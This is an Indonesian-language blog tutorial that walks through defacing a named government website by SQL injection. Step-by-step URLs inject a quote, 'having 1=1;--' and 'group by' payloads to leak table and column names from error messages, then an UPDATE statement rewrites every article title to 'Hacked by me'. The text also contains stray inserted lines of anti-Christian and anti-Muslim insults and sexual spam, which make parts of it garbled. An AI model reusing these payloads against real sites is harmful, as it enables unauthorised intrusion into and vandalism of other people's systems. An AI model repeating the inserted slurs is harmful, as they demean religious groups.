Sql injection

diknas.go.id bagian 9
Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe
kek lagu aja yah…
yaudah gak papa kek lagu… yang penting gw tetap ganteng

Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm…
untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk
percobaan…

Webnya adalah…

http://diknas.go.id/
hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah
membuka salah satu link artikelnya, contoh :
http://diknas.go.id/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan
menambahkan satu karakter ‘ setelah kode artikel… contoh :
http://diknas.go.id/artikel.asp?naskah_id=102′
Tekad orang Kristen
hapuskan pelajaran
pancasila dasar goblok
orang islam !!!!!!!!!!!!!!
1
Oooopppsss keknya terjadi error….

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs…

oke… ayo kita buat error lagi, sampe orgasme… loh!?
kali ini kita membuat error dengan : having 1=1;–
contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ having 1=1;–

errornya seperti ini :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in

an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230

py_Naskah.naskah_id ini adalah nama tabel dan kolom database

py_Naskah => nama tabel
naskah_id => nama kolom

sekarang kita cari tau tabel berikutnya…

contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id
having 1=1;–

error lagi :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in

either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

sekarang kita dapat py_Naskah.category

berarti kitambah di urlnya
contoh : http://diknas.go.id/artikel.asp?naskah_id=102′ group by
py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error berikutnya :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in
either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

urlnya menjadi :
http://diknas.go.id/artikel.asp?naskah_id=102′ group by
py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya kita menggunakan cara berikut :

http://diknas.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by

me’;–

Hasilnya

Oke that’s all

Good Luck

http://bl4ckb0t.co.cc/
_________________
What da fuck!!! are u looking for!?

Aminah tangerang montoknya staf rumah sakit

tangerang